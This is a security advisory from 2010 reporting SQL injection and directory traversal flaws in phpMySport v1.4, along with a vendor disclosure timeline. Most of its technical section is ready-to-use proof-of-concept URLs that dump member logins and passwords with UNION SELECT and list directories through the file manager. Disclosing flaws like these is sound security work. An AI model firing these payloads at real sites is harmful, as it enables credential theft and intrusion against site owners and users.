#######################################################################
Multiple Vulnerabilities in phpMySport v1.4
Name Multiple Vulnerabilities in phpMySport
Systems Affected phpMySport v1.4
site http://phpmysport.sourceforge.net/en/
Author Amol Naik (amolnaik4[at]gmail.com)
Date 18/01/2010
#######################################################################
############
OVERVIEW
############
phpMySport v1.4 is vulnerable to following issues:
1. Multiple SQL Injection
2. Unprotected Access to File Manager
####################
Technical Details
####################
1. Multiple SQL Injection:
Multiple SQL Injection instances exist in phpmysport v1.4 when "magic_quotes_gpc = OFF".
PoC:
+++++
http://localhost/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+-
http://localhost/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+-
http://localhost/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+-
http://localhost/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+-
http://localhost/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+-
http://localhost/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+-
2. Unprotected Access to File Manager:
Access to File manager is unprotected and by using dot-dot-slash (/../../), it is possible to view directory structure of the target system.
PoC:
+++++
http://localhost/phpmysport/index.php?r=file&v1=file_manager¤t_folder=/../../../&fen=pop
#############
TimeLine
#############
Bug Discovered: 01/01/2010
Informed Vendor: 09/01/2010 -- no response received
Public Disclosure: 18/01/2010